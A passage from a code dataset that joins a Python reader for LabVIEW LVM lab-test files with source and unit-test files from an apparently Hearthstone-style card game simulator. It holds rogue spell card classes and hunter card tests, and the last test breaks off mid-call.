elif '\t-------\t-------\t-------' in id and val <1000:
numbering.append(val)
elif '\t-------\t-------\t-------' in id and val >1000:
numbering.append(val)
## Divide up LVM file according to buildup
# Normal case
if len(numbering) <= 4:
header = lines[numbering[0]+1:numbering[1]]
calibData = lines[numbering[1]+1:numbering[2]]
columnName = lines[numbering[2]+1:numbering[3]]
data = lines[numbering[3]+1:]
# Convert comma to dot in data
for val, id in enumerate(data):
data[val] = id.replace(",", ".")
for val, id in enumerate(calibData):
calibData[val] = id.replace(",", ".")
# Split string data into lists
fileID = re.split(r'\t+', fileID.rstrip('\n'))
for i in range(len(header)):
header[i] = re.split(r'\t+', header[i].rstrip('\n'))
if 'Depth' in header[i]:
# Convert comma to dot in depth
header[i][1] = header[i][1].replace(",", ".")
for i in range(len(calibData)):
calibData[i] = re.split(r'\t+', calibData[i].rstrip('\n'))
for i in range(len(columnName)):
columnName[i] = re.split(r'\t+', columnName[i].rstrip('\n'))
for i in range(len(data)):
data[i] = re.split(r'\t+', data[i].rstrip('\n'))
# Store time and mode in new lists
for i in range(len(data)):
time.append(data[i].pop(0)) # Timestamp
mode.append(data[i].pop(-1)) # Mode
# Convert timestamp to seconds
d = []
for i in range(len(time)):
h, m, s = time[i].split(':')
if int(h) == 0 and int(prevTime.split(':')[0]) == 23:
d.append(i)
prevTime = time[i]
time[i] = len(d)*24*3600 + int(h)*3600 + int(m)*60 + int(float(s))
time = np.array(time)
time = time - time[0] # Set initial time to zero
# Convert list to 2D numpy float array
fileID = np.array(fileID)
header = np.array(header)
columnName = np.array(columnName)
calibData = np.array(calibData)
data = np.array(data)
data = data.astype(np.float)
# Search for changes in modes
change = mode[0] # Initial value
modeChange = [change]
for val, id in enumerate(mode):
if change != mode[val]:
change = id
modeChange.append(id+' '+str(val))
# Return one array for consistency
bundleAllInfo = [fileID, header, calibData, columnName, time, modeChange, data]
return bundleAllInfo
# TODO: Must fix LVM reader for coldroom triaxial
## Adapted to fit with weird triaxial data in cooling room
else:
header = lines[numbering[0]+1:numbering[1]]
calibData = lines[numbering[1]+1:numbering[2]]
columnName = lines[numbering[2]+1:numbering[3]]
dat_1 = lines[numbering[3]+1:numbering[4]-3]
dat_2 = lines[numbering[4]+1:]
data = dat_1 + dat_2
del dat_1, dat_2
# Convert comma to dot in data
for val, id in enumerate(data):
data[val] = id.replace(",", ".")
for val, id in enumerate(calibData):
calibData[val] = id.replace(",", ".")
# Split stri--ng data into lists
fileID = re.split(r'\t+', fileID.rstrip('\n'))
for i in range(len(header)):
header[i] = re.split(r'\t+', header[i].rstrip('\n'))
if 'Depth' in header[i]:
# Convert comma to dot in depth
header[i][1] = header[i][1].replace(",", ".")
for i in range(len(calibData)):
calibData[i] = re.split(r'\t+', calibData[i].rstrip('\n'))
for i in range(len(columnName)):
columnName[i] = re.split(r'\t+', columnName[i].rstrip('\n'))
for i in range(len(data)):
data[i] = re.split(r'\t+', data[i].rstrip('\n'))
# Make array rectangular
if len(data[-1])>len(data[3]):
extraInfoInData = data[-1].pop(-1) # Label in LVM
# Store time and mode in new lists
for i in range(len(data)):
time.append(data[i].pop(0)) # Timestamp
mode.append(data[i].pop(-1)) # Mode
#
# if len(data[0])<len(data[3]): # Add empty entries
# data[0].append(0)
#
for i in range(len(data)):
if len(data[i])<len(data[5]): # Add empty entries
data[i].append(0)
# Convert timestamp to seconds
d = []
for i in range(len(time)):
h, m, s = time[i].split(':')
if int(h) == 0 and int(prevTime.split(':')[0]) == 23:
d.append(i)
prevTime = time[i]
time[i] = len(d)*24*3600 + int(h)*3600 + int(m)*60 + int(float(s))
time = np.array(time)
time = time - time[0] # Set initial time to zero
# Convert list to 2D numpy float array
fileID = np.array(fileID)
header = np.array(header)
columnName = np.array(columnName)
calibData = np.array(calibData)
data = np.array(data)
data = data.astype(np.float)
# Search for changes in modes
change = mode[0] # Initial value
modeChange = [change]
for val, id in enumerate(mode):
if change != mode[val]:
change = id
modeChange.append(id+' '+str(val))
# Return one array for consistency
bundleAllInfo = [fileID, header, calibData, columnName, time, modeChange, data]
return bundleAllInfo
if __name__ == "__main__":
import sys
from PyQt4 import QtGui
import numpy as np
# # For testing
filey = ".\\Raw files\\oedometer.lvm"
# filey = '.\\Raw files\\Cold Room\\Test4_Unknown.lvm'
# filey = '.\\Raw files\\Treax - 2015\\G5-1_CIUc_D9-30m.lvm'
fileID, header, calibData, columnName, time, modeChange, data = readLVM(filey)
``` |
{
"source": "jomyhuang/sdwle",
"score": 2
} |
#### File: cards_copy/spells/rogue.py
```python
import copy
from SDWLE.cards.base import SpellCard
from SDWLE.tags.action import AddCard
from SDWLE.tags.base import Effect, BuffUntil, Buff, AuraUntil, ActionTag
from SDWLE.tags.condition import IsSpell
from SDWLE.tags.event import TurnStarted, TurnEnded, SpellCast
from SDWLE.tags.selector import PlayerSelector, CardSelector
from SDWLE.tags.status import Stealth, ChangeAttack, ManaChange
import SDWLE.targeting
from SDWLE.constants import CHARACTER_CLASS, CARD_RARITY
class Assassinate(SpellCard):
def __init__(self):
super().__init__("Assassinate", 5, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.die(self)
class Backstab(SpellCard):
def __init__(self):
super().__init__("Backstab", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_minion_spell_target,
filter_func=lambda target: target.health == target.calculate_max_health() and
target.spell_targetable())
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(2), self)
class Betrayal(SpellCard):
def __init__(self):
super().__init__("Betrayal", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
left_minion = None
right_minion = None
index = self.target.index
if index > 0:
left_minion = game.other_player.minions[index - 1]
if index < min(len(game.other_player.minions) - 1, 6):
right_minion = game.other_player.minions[index + 1]
original_immune = self.target.immune
self.target.immune = True
if left_minion is not None:
left_minion.damage(self.target.calculate_attack(), self.target)
if right_minion is not None:
right_minion.damage(self.target.calculate_attack(), self.target)
self.target.immune = original_immune
class BladeFlurry(SpellCard):
def __init__(self):
super().__init__("Blade Flurry", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
if player.weapon is not None:
# Yes, this card is affected by spell damage cards.
# Source: http://www.hearthhead.com/card=1064/blade-flurry#comments:id=1927317
attack_power = player.effective_spell_damage(player.hero.calculate_attack())
player.weapon.destroy()
for minion in copy.copy(game.other_player.minions):
minion.damage(attack_power, self)
game.other_player.hero.damage(attack_power, self)
class ColdBlood(SpellCard):
def __init__(self):
super().__init__("Cold Blood", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
if player.cards_played > 0:
self.target.change_attack(4)
else:
self.target.change_attack(2)
class Conceal(SpellCard):
def __init__(self):
super().__init__("Conceal", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in player.minions:
if not minion.stealth:
minion.add_buff(BuffUntil(Stealth(), TurnStarted()))
class DeadlyPoison(SpellCard):
def __init__(self):
super().__init__("Deadly Poison", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
player.weapon.base_attack += 2
player.hero.change_temp_attack(2)
def can_use(self, player, game):
return super().can_use(player, game) and player.weapon is not None
class Eviscerate(SpellCard):
def __init__(self):
super().__init__("Eviscerate", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
if player.cards_played > 0:
self.target.damage(player.effective_spell_damage(4), self)
else:
self.target.damage(player.effective_spell_damage(2), self)
class FanOfKnives(SpellCard):
def __init__(self):
super().__init__("Fan of Knives", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(1), self)
player.draw()
class Headcrack(SpellCard):
def __init__(self):
super().__init__("Headcrack", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
game.other_player.hero.damage(player.effective_spell_damage(2), self)
if player.cards_played > 0:
player.add_effect(Effect(TurnEnded(), ActionTag(AddCard(self), PlayerSelector())))
class Preparation(SpellCard):
def __init__(self):
super().__init__("Preparation", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def use(self, player, game):
super().use(player, game)
player.add_aura(AuraUntil(ManaChange(-3), CardSelector(condition=IsSpell()), SpellCast()))
class Sap(SpellCard):
def __init__(self):
super().__init__("Sap", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.bounce()
class Shadowstep(SpellCard):
def __init__(self):
super().__init__("Shadowstep", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_friendly_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.bounce()
self.target.card.add_buff(Buff(ManaChange(-3)))
class Shiv(SpellCard):
def __init__(self):
super().__init__("Shiv", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(1), self)
player.draw()
class SinisterStrike(SpellCard):
def __init__(self):
super().__init__("Sinister Strike", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
game.other_player.hero.damage(player.effective_spell_damage(3), self)
class Sprint(SpellCard):
def __init__(self):
super().__init__("Sprint", 7, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for i in range(0, 4):
player.draw()
class Vanish(SpellCard):
def __init__(self):
super().__init__("Vanish", 6, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
targets = copy.copy(game.other_player.minions)
targets.extend(player.minions)
# Minions are returned to a player's hand in the order in which they were played.
# Source: http://www.hearthhead.com/card=196/vanish#comments:id=1908549
for minion in sorted(targets, key=lambda m: m.born):
minion.bounce()
class TinkersSharpswordOil(SpellCard):
def __init__(self):
super().__init__("Tinker's Sharpsword Oil", 4, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
player.weapon.base_attack += 3
player.hero.change_temp_attack(3)
if player.cards_played > 0:
targets = SDWLE.targeting.find_friendly_minion_battlecry_target(player.game, lambda x: x)
if targets is not None:
target = player.game.random_choice(targets)
target.add_buff(Buff(ChangeAttack(3)))
def can_use(self, player, game):
return super().can_use(player, game) and player.weapon is not None
class Sabotage(SpellCard):
def __init__(self):
super().__init__("Sabotage", 4, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def use(self, player, game):
super().use(player, game)
targets = SDWLE.targeting.find_enemy_minion_battlecry_target(player.game, lambda x: True)
target = game.random_choice(targets)
target.die(None)
game.check_delayed()
if player.cards_played > 0 and game.other_player.weapon is not None:
game.other_player.weapon.destroy()
def can_use(self, player, game):
return super().can_use(player, game) and len(game.other_player.minions) >= 1
class GangUp(SpellCard):
def __init__(self):
super().__init__("Gang Up", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
for i in range(3):
player.put_back(type(self.target.card)())
```
#### File: testsSDW__copy/agents/trade_agent_tests.py
```python
import unittest
from SDWLE.agents.trade.possible_play import PossiblePlays
from SDWLE.cards import Wisp, WarGolem, BloodfenRaptor, RiverCrocolisk, AbusiveSergeant, ArgentSquire
from testsSDW.agents.trade.test_helpers import TestHelpers
from testsSDW.agents.trade.test_case_mixin import TestCaseMixin
class TestTradeAgent(TestCaseMixin, unittest.TestCase):
def test_setup_smoke(self):
game = TestHelpers().make_game()
self.add_minions(game, 0, Wisp(), WarGolem())
self.add_minions(game, 1, BloodfenRaptor())
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
def test_basic_trade(self):
game = TestHelpers().make_game()
self.add_minions(game, 1, Wisp(), WarGolem())
self.add_minions(game, 0, BloodfenRaptor())
self.make_all_active(game)
game.play_single_turn()
self.assert_minions(game.players[1], "War Golem")
self.assert_minions(game.players[0], "Bloodfen Raptor")
def test_buff_target(self):
game = TestHelpers().make_game()
self.add_minions(game, 0, BloodfenRaptor(), RiverCrocolisk())
self.make_all_active(game)
game.players[0].agent.player = game.players[0]
self.add_minions(game, 0, AbusiveSergeant())
game.play_single_turn()
def test_hero_power(self):
game = self.make_game()
cards = self.make_cards(game.current_player, ArgentSquire())
possible_plays = PossiblePlays(cards, 10, allow_hero_power=True)
self.assertEqual(1, len(possible_plays.plays()))
```
#### File: testsSDW__copy/card_tests/hunter_tests.py
```python
import random
import unittest
from SDWLE.agents.basic_agents import DoNothingAgent, PredictableAgent
from SDWLE.constants import MINION_TYPE
from testsSDW.agents.testing_agents import CardTestingAgent, OneCardPlayingAgent, WeaponTestingAgent, \
PlayAndAttackAgent, SelfSpellTestingAgent
from testsSDW.testing_utils import generate_game_for, mock
from SDWLE.cards import *
class TestHunter(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_HuntersMark(self):
game = generate_game_for(HuntersMark, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[0].calculate_max_health())
# This will play all the hunter's marks currently in the player's hand
game.play_single_turn()
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[0].calculate_max_health())
def test_TimberWolf(self):
game = generate_game_for([StonetuskBoar, FaerieDragon, KoboldGeomancer, TimberWolf],
StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(3, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[5].calculate_attack())
self.assertEqual(3, game.current_player.minions[4].calculate_attack())
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(1, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
game.current_player.minions[1].die(None)
game.current_player.minions[1].activate_delayed()
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[4].calculate_attack())
self.assertEqual(3, game.current_player.minions[3].calculate_attack())
self.assertEqual(2, game.current_player.minions[2].calculate_attack())
self.assertEqual(1, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
game.current_player.minions[3].die(None)
game.current_player.minions[3].activate_delayed()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(2, game.current_player.minions[2].calculate_attack())
self.assertEqual(1, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
wolf = game.current_player.minions[1]
wolf.die(None)
wolf.activate_delayed()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
def test_ArcaneShot(self):
game = generate_game_for(ArcaneShot, StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.players[0].spell_damage = 1
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
def test_BestialWrath(self):
def verify_bwrath():
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertTrue(game.players[0].minions[0].immune)
def verify_silence():
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game = generate_game_for([StonetuskBoar, BestialWrath, BestialWrath, BestialWrath, Silence, Archmage], Wisp,
CardTestingAgent, DoNothingAgent)
game.play_single_turn()
game.play_single_turn()
game.players[0].bind_once("turn_ended", verify_bwrath)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game.play_single_turn()
game.players[0].bind_once("turn_ended", verify_silence)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, len(game.players[0].hand))
def test_Flare(self):
game = generate_game_for(Vaporize, [WorgenInfiltrator, WorgenInfiltrator],
CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
# Vaporize is in place and two Infiltrators are down
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(3, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].stealth)
self.assertTrue(game.other_player.minions[1].stealth)
self.assertEqual(4, len(game.other_player.hand))
old_play = game.other_player.agent.do_turn
def _play_and_attack(player):
flare = Flare()
flare.target = None
flare.use(player, player.game)
old_play(player)
player.minions[4].attack()
game.other_player.agent.do_turn = _play_and_attack
game.play_single_turn()
# All of the Worgens should still be alive, because Vaporize is gone.
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(7, len(game.current_player.minions))
for minion in game.current_player.minions[4:]:
self.assertFalse(minion.stealth)
def test_EaglehornBow(self):
game = generate_game_for([Snipe, EaglehornBow], StonetuskBoar, PlayAndAttackAgent,
OneCardPlayingAgent)
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, game.players[0].weapon.durability)
self.assertEqual(3, game.players[0].weapon.base_attack)
# Snipe should trigger, granting our weapon +1 durability
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.durability)
self.assertEqual(3, game.players[0].weapon.base_attack)
def test_GladiatorsLongbow(self):
game = generate_game_for(GladiatorsLongbow, WaterElemental, WeaponTestingAgent,
OneCardPlayingAgent)
for turn in range(0, 13):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.current_player.hero.health)
self.assertFalse(game.current_player.hero.frozen)
self.assertFalse(game.current_player.hero.immune)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(30, game.current_player.hero.health)
self.assertFalse(game.current_player.hero.frozen)
self.assertFalse(game.current_player.hero.immune)
self.assertEqual(0, len(game.current_player.events))
def test_Tracking(self):
game = generate_game_for([Tracking, Tracking, Tracking, Tracking,
StonetuskBoar, BloodfenRaptor, KoboldGeomancer],
StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.players[0].agent.choose_option = lambda options, player: options[0]
game.play_single_turn()
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual("Stonetusk Boar", game.current_player.hand[3].name)
self.assertEqual(23, game.current_player.deck.left)
def test_ExplosiveTrap(self):
game = generate_game_for(ExplosiveTrap, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(1, len(game.other_player.minions))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(28, game.current_player.hero.health)
self.assertEqual(29, game.other_player.hero.health)
random.seed(1857)
game = generate_game_for(ExplosiveTrap, Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(27, game.other_player.hero.health)
def test_FreezingTrap(self):
game = generate_game_for(FreezingTrap, BluegillWarrior, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
self.assertEqual(7, len(game.players[1].hand))
self.assertEqual(4, game.players[1].hand[6].mana_cost())
self.assertEqual(0, len(game.players[0].secrets))
self.assertEqual(30, game.players[0].hero.health)
game.play_single_turn()
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(8, len(game.players[1].hand))
self.assertEqual(4, game.players[1].hand[5].mana_cost())
self.assertEqual(4, game.players[1].hand[7].mana_cost())
def test_FreezingTrap_many_cards(self):
class FreezingTrapAgent(DoNothingAgent):
def do_turn(self, player):
if player.mana == 6:
game.play_card(player.hand[0])
if player.mana == 7:
player.minions[0].attack()
game = generate_game_for(FreezingTrap, BoulderfistOgre, CardTestingAgent, FreezingTrapAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
death_mock = mock.Mock()
game.players[1].minions[0].bind_once("died", death_mock)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(10, len(game.current_player.hand))
self.assertEqual(0, len(game.current_player.minions))
for card in game.current_player.hand:
if card.name != "The Coin":
self.assertEqual(6, card.mana_cost())
self.assertEqual(30, game.other_player.hero.health)
death_mock.assert_called_once_with(None)
def test_Misdirection(self):
game = generate_game_for(Misdirection, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.current_player.minions)) # The boar has been misdirected into another boar
self.assertEqual(30, game.current_player.hero.health)
def test_MisdirectionToHero(self):
game = generate_game_for(Misdirection, BluegillWarrior, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.other_player.hero.health) # The murloc should be misdirected
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(28, game.current_player.hero.health)
def test_FreezingTrapAndMisdirection(self):
game = generate_game_for([Misdirection, FreezingTrap], Wolfrider,
CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 6):
game.play_single_turn()
# Misdirection was played first so it triggers first redirecting the atttack to the enemy hero, but
# Freezing Trap triggers, bouncing the charging Wolfrider
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(8, len(game.players[1].hand))
self.assertEqual(5, game.players[1].hand[7].mana_cost())
self.assertEqual(4, len(game.players[0].hand))
self.assertEqual(30, game.other_player.hero.health)
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(0, len(game.players[0].secrets))
game.play_single_turn() # Should be able to play both Misdirection and Freezing Trap again
self.assertEqual(3, len(game.players[0].hand))
def test_Snipe(self):
game = generate_game_for([MagmaRager, OasisSnapjaw, FeralSpirit], Snipe, CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.minions))
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[2].health)
def test_ExplosiveTrap_hero(self):
game = generate_game_for(ExplosiveTrap, Naturalize, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(29, game.current_player.hero.health)
self.assertEqual(29, game.other_player.hero.health)
def test_SavannahHighmane(self):
game = generate_game_for(SavannahHighmane, SiphonSoul, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Hyena", game.players[0].minions[0].card.name)
self.assertEqual("Hyena", game.players[0].minions[1].card.name)
def test_Houndmaster(self):
game = generate_game_for([Houndmaster, StonetuskBoar], IronfurGrizzly, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertEqual(3, game.players[1].minions[0].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("<NAME>", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[2].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].health)
def test_DeadlyShot(self):
game = generate_game_for(DeadlyShot, SenjinShieldmasta, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
# Can't use until a unit is on the field
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(0, len(game.players[1].minions))
def test_MultiShot(self):
game = generate_game_for(MultiShot, SenjinShieldmasta, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(5, game.players[1].minions[0].health)
self.assertEqual(5, game.players[1].minions[1].health)
# Can't use until 2 units are on the field
game.play_single_turn()
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(2, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
def test_ExplosiveShot(self):
game = generate_game_for(IronfurGrizzly, ExplosiveShot, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 9):
game.play_single_turn()
game.players[1].agent.choose_target = lambda targets: targets[len(targets) - 2]
self.assertEqual(3, len(game.players[0].minions))
game.play_single_turn()
# Explosive Shot the middle Grizzly
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
def test_KillCommand(self):
game = generate_game_for([KillCommand, StonetuskBoar], StonetuskBoar,
SelfSpellTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(27, game.players[0].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(22, game.players[0].hero.health)
def test_UnleashTheHounds(self):
game = generate_game_for(UnleashTheHounds, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual("Hound", game.players[0].minions[0].card.name)
self.assertEqual("Hound", game.players[0].minions[1].card.name)
def test_StarvingBuzzard(self):
game = generate_game_for(StarvingBuzzard, StonetuskBoar, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(5, len(game.players[1].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(4, len(game.players[1].hand))
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(4, len(game.players[1].hand))
def test_BuzzardAndOwl(self):
game = generate_game_for([StarvingBuzzard, IronbeakOwl], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
# The buzzard should be silenced, but only after drawing a card from the owl
self.assertEqual(8, len(game.current_player.hand))
self.assertEqual(0, len(game.current_player.minions[1].effects))
def test_TundraRhino(self):
game = generate_game_for([StonetuskBoar, OasisSnapjaw, TundraRhino], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(26, game.players[1].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(21, game.players[1].hero.health)
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[1].charge())
self.assertTrue(game.players[0].minions[2].charge())
game.players[0].minions[2].silence()
self.assertTrue(game.players[0].minions[2].charge())
def test_TundraRhino_with_silence(self):
game = generate_game_for([StonetuskBoar, OasisSnapjaw, TundraRhino, Silence], StonetuskBoar,
